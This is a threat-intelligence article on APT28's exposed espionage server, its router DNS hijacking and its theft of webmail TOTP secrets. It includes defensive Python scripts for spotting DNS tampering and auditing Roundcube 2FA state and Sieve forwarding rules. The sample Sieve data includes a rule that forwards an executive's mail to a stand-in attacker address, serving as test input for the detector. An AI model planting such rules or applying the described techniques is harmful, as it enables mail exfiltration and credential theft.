FancyBear - Exposed Server Reveals Espionage Secrets

FancyBear's exposed server has revealed sensitive espionage data while the group continues to target routers for credential theft. Organizations must act swiftly to secure their systems.

Threat Intel · Severity: HIGH · 2 sources

Original Reporting

Cyber Security News · Tushar Subhra Dutta

AI Summary

CyberPings AI · Reviewed by Rohit Rana

🎯 FancyBear (APT28), a Russian GRU-linked group, left an open directory on one of its servers, exposing emails, credentials and contact lists harvested from government and military targets in NATO countries. In parallel, the group is still hijacking the DNS settings of SOHO routers to send users to credential-phishing pages. Webmail and router administrators should check for both.

The Threat

On March 11, 2026, threat intelligence firm Hunt.io disclosed a significant operational security failure by the Russian hacking group FancyBear. The group, also tracked as APT28, has been linked to espionage campaigns against government and military organizations across Europe. An open directory on a Namecheap virtual private server (VPS) let researchers read a large body of sensitive data from an operation dubbed Operation Roundish. The incident shows both how a single operator mistake can expose an entire campaign and how persistent state-sponsored collection against these targets is.

The compromised server, located in the United States, had been publicly attributed to FancyBear for over 500 days. During this time, the group continued its operations without switching infrastructure, leading to a treasure trove of stolen data being exposed. Researchers found 2,800 exfiltrated emails, 240 sets of stolen credentials, and 11,500 contact addresses from various military and government entities across multiple countries, including NATO member states.

Separately, the UK's NCSC has warned about FancyBear's ongoing attacks on routers, particularly small office and home office (SOHO) devices. The group exploits vulnerabilities in those devices to change their DNS settings, so that victims' lookups for legitimate services such as Outlook resolve to attacker-controlled look-alike sites that harvest credentials. The campaign has reportedly compromised over 200 organizations and 5,000 devices, indicating a broad and continuing effort to gather intelligence and steal credentials.

Who's Behind It

FancyBear is assessed by the UK's NCSC to be GRU Military Intelligence Unit 26165. The group has a history of targeting organizations linked to military and government operations, particularly those involved in the war in Ukraine. The targeting pattern is deliberate: the largest victim group was Ukraine's regional prosecutors, likely connected to war crimes investigations, and other affected organizations include Romania's Air Force and Greece's National Defence General Staff. Email addresses tied to NATO infrastructure were among the exposed data. The value of the haul goes beyond the stolen messages themselves: the contact lists and credentials can seed follow-on phishing and intrusions by FancyBear or other groups.

Tactics & Techniques

One of the most alarming discoveries from this incident was FancyBear's method for defeating two-factor authentication (2FA). The group used a JavaScript module called keyTwoAuth.js that ran inside the victim's already-authenticated webmail session. Because the browser was logged in, the script could read the account's TOTP secrets and recovery codes through the same interface the user would, and it did so silently, with no login prompt or alert to warn the victim. Stealing the TOTP seed rather than a single one-time code means the attacker can generate valid codes for as long as that secret stays in use, which is why rotating the secrets, and not just the passwords, is part of the response.

The NCSC has separately reported that FancyBear uses DNS hijacking to send users to fake login pages that capture their credentials. The group typically targets widely deployed routers, including TP-Link and Cisco devices. Once the resolver a router hands out is under attacker control, every client behind it can be redirected without any malware on the endpoint, which is why vulnerable network devices are such valuable footholds for a sophisticated hostile actor.
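A practical way to look for the DNS manipulation described above is to compare what the resolver a router advertises returns for high-value login domains against what a trusted resolver returns, while allowing for normal geo-DNS variance. The script below is an added example, not code from the article or from the NCSC advisory; the watched domains, the expected prefixes and both answer sets are constructed placeholders using RFC 5737 documentation ranges, and the live query path assumes the dnspython package is installed.

```python
"""Spot DNS answers that differ between a router-provided resolver and a trusted one.

Added example, not code from the article or the NCSC advisory. Runs offline on the
constructed answer sets below; live_answers() is an optional path that assumes
dnspython is installed and has network access.
"""
import ipaddress

# Address space a public login domain should never resolve to (a hijacked router may
# serve the fake page itself). Listed explicitly: ipaddress.is_private also matches
# the RFC 5737 documentation ranges used in the sample data, which would mislabel it.
LOCAL_NETS = [ipaddress.ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Prefixes legitimate answers may fall in. Constructed placeholders: populate from
# your own allowlist or the provider's published ranges.
EXPECTED_PREFIXES = {
    "outlook.office.com": ["198.51.100.0/24"],
    "login.microsoftonline.com": ["203.0.113.0/24"],
    "mail.example.org": ["192.0.2.0/28"],
}


def classify(domain, suspect, trusted, expected_prefixes=EXPECTED_PREFIXES):
    """Label one domain's answer from the suspect resolver."""
    ips = [ipaddress.ip_address(a) for a in suspect]
    if not ips:
        return "no-answer"
    if any(ip in net for ip in ips for net in LOCAL_NETS):
        return "private-answer"          # public login domain pointing into the LAN
    if set(suspect) & set(trusted):
        return "ok"                      # at least one address agrees with trusted
    nets = [ipaddress.ip_network(p) for p in expected_prefixes.get(domain, [])]
    if nets and all(any(ip in n for n in nets) for ip in ips):
        return "ok-other-pop"            # differs, but inside known prefixes (geo-DNS)
    return "MISMATCH"                    # unlike trusted and outside known space


def compare(suspect_answers, trusted_answers, expected_prefixes=EXPECTED_PREFIXES):
    """Classify every domain seen by either resolver."""
    domains = sorted(set(suspect_answers) | set(trusted_answers))
    return {d: classify(d, suspect_answers.get(d, []), trusted_answers.get(d, []),
                        expected_prefixes) for d in domains}


def live_answers(resolver_ip, domains):
    """A records from one resolver via dnspython (assumed installed; needs network)."""
    import dns.resolver
    import dns.exception
    res = dns.resolver.Resolver(configure=False)
    res.nameservers = [resolver_ip]
    answers = {}
    for d in domains:
        try:
            answers[d] = sorted(rr.address for rr in res.resolve(d, "A"))
        except dns.exception.DNSException:
            answers[d] = []
    return answers


# Constructed sample: answers from a trusted resolver ...
TRUSTED = {
    "outlook.office.com": ["198.51.100.10", "198.51.100.11"],
    "login.microsoftonline.com": ["203.0.113.20"],
    "mail.example.org": ["192.0.2.5"],
    "login.example.org": ["192.0.2.40"],
}
# ... and from the resolver the router hands out over DHCP.
SUSPECT = {
    "outlook.office.com": ["198.51.100.12"],      # another PoP in the same prefix
    "login.microsoftonline.com": ["203.0.113.20"],
    "mail.example.org": ["192.0.2.77"],           # outside the expected /28
    "login.example.org": ["192.168.1.1"],         # the router itself
}

if __name__ == "__main__":
    for domain, verdict in compare(SUSPECT, TRUSTED).items():
        print(f"{verdict:15} {domain}  suspect={SUSPECT.get(domain)} trusted={TRUSTED.get(domain)}")
```

A MISMATCH is a lead, not proof: CDNs rotate addresses, so keep the expected-prefix allowlist current and confirm with the certificate the suspect address actually serves. A private-answer for a public login domain is much harder to explain innocently, especially when the address is the router's own.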

Defensive Measures

Organizations running Roundcube with the twofactor_gauthenticator plugin must act immediately. Treat every existing TOTP secret and set of recovery codes as compromised and rotate them now, which in practice means having each affected user re-enrol. Administrators should also audit email-filtering (Sieve) rules for unauthorized entries, such as forwards to outside addresses, and block connections to the exposed server's IP address and domain given in the original reporting.
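For the Roundcube actions above, the following added example (not code from the article, from Roundcube or from the plugin) shows the two audit steps on constructed data: listing accounts whose stored preferences hold a TOTP secret or recovery codes so they can be forced to re-enrol, and scanning a user's Sieve filter script for redirects to external addresses. It assumes Roundcube keeps per-user settings PHP-serialized in the users.preferences column and that the plugin uses the preference keys named in PLUGIN_KEYS; confirm both against your installation before acting on the output.

```python
"""Post-incident checks for Roundcube + twofactor_gauthenticator (added example).

Assumptions to verify: users.preferences holds a PHP serialize() blob, and the plugin
stores its state under the keys in PLUGIN_KEYS. All sample data is constructed.
"""
import re

PLUGIN_KEYS = (                      # assumed plugin preference names
    "twofactor_gauthenticator_activate",
    "twofactor_gauthenticator_secret",
    "twofactor_gauthenticator_recovery_codes",
)


def php_unserialize(data: str):
    """Decode the PHP serialize() subset preferences use: N, b, i, d, s, a."""
    pos = 0

    def parse():
        nonlocal pos
        t = data[pos]
        if t == "N":
            pos += 2                                   # 'N;'
            return None
        if t in "ibd":
            end = data.index(";", pos)
            raw = data[pos + 2:end]
            pos = end + 1
            return {"i": int, "d": float, "b": lambda v: v == "1"}[t](raw)
        if t == "s":
            colon = data.index(":", pos + 2)
            length = int(data[pos + 2:colon])          # byte length; ASCII assumed
            start = colon + 2                          # skip ':"'
            value = data[start:start + length]
            pos = start + length + 2                   # skip '";'
            return value
        if t == "a":
            colon = data.index(":", pos + 2)
            count = int(data[pos + 2:colon])
            pos = colon + 2                            # skip ':{'
            items = {}
            for _ in range(count):
                key = parse()
                items[key] = parse()
            pos += 1                                   # skip '}'
            return items
        raise ValueError(f"unsupported PHP type {t!r} at offset {pos}")

    return parse()


def php_serialize(value) -> str:
    """Inverse of php_unserialize for the same subset (bool must precede int)."""
    if value is None:
        return "N;"
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, float):
        return f"d:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'
    body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
    return f"a:{len(value)}:{{{body}}}"


def accounts_needing_rotation(users: dict) -> list:
    """Usernames whose preferences carry TOTP state; each must re-enrol."""
    hits = []
    for username, blob in users.items():
        prefs = php_unserialize(blob)
        if prefs.get("twofactor_gauthenticator_secret") or prefs.get("twofactor_gauthenticator_activate"):
            hits.append(username)
    return hits


def reset_two_factor(blob: str) -> str:
    """Preferences blob with all plugin state removed, forcing fresh enrolment."""
    prefs = php_unserialize(blob)
    for key in PLUGIN_KEYS:
        prefs.pop(key, None)
    return php_serialize(prefs)


# Matches 'redirect "addr"' and 'redirect :copy "addr"' in a Sieve script.
SIEVE_REDIRECT = re.compile(r'\bredirect\b(?:\s+:\w+)*\s+"([^"]+)"', re.IGNORECASE)


def external_redirects(sieve_script: str, allowed_domains: set) -> list:
    """Addresses a Sieve script forwards mail to outside the allowed domains."""
    found = []
    for line in sieve_script.splitlines():
        if line.lstrip().startswith("#"):              # Roundcube rule-name comments
            continue
        for addr in SIEVE_REDIRECT.findall(line):
            if addr.rsplit("@", 1)[-1].lower() not in allowed_domains:
                found.append(addr)
    return found


# Constructed rows, as from: SELECT username, preferences FROM users;
SAMPLE_USERS = {
    "alice": ('a:4:{s:8:"language";s:5:"en_US";'
              's:33:"twofactor_gauthenticator_activate";b:1;'
              's:31:"twofactor_gauthenticator_secret";s:16:"JBSWY3DPEHPK3PXP";'
              's:39:"twofactor_gauthenticator_recovery_codes";a:2:{i:0;s:8:"11111111";i:1;s:8:"22222222";}}'),
    "bob": 'a:1:{s:8:"language";s:5:"de_DE";}',
}

# Constructed managesieve script: one internal copy rule, one exfiltration rule.
SAMPLE_SIEVE = """require ["fileinto", "copy"];
# rule:[Keep a copy in the archive mailbox]
if true { redirect :copy "archive@example.org"; }
# rule:[Lists]
if header :contains "list-id" "dev" { fileinto "Lists"; }
if address :is "from" "ciso@example.org" { redirect "collect@attacker.invalid"; }
"""

if __name__ == "__main__":
    print("rotate TOTP for:", accounts_needing_rotation(SAMPLE_USERS))
    print("external redirects:", external_redirects(SAMPLE_SIEVE, {"example.org"}))
    print("reset blob for alice:", reset_two_factor(SAMPLE_USERS["alice"]))
```

The reset blob is what you would write back to force fresh enrolment; because the attacker held the TOTP seed, simply flipping the activate flag without re-enrolment leaves the account protected by the password alone, so pair the reset with a password change and a check of the user's active sessions. Filter scripts can be exported through the managesieve service and fed to external_redirects one user at a time.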

The NCSC also stresses hardening routers against DNS hijacking: keep firmware current, disable administration from the WAN side, replace devices that no longer receive updates, and verify that the DNS servers a device is configured with, and hands out to clients, are the expected ones. On the webmail side, apply the Roundcube fix for CVE-2023-43770, a cross-site scripting flaw that allows injected script to run inside a victim's session, and monitor webmail infrastructure for signs of injected script. The incident is a reminder that an adversary's operational mistake on one front does not reduce the need for disciplined patching and monitoring on the other.

🔒 Pro Insight

The dual threat posed by FancyBear's exposed server and ongoing router attacks underscores the need for organizations to implement layered security strategies and remain vigilant against evolving tactics.
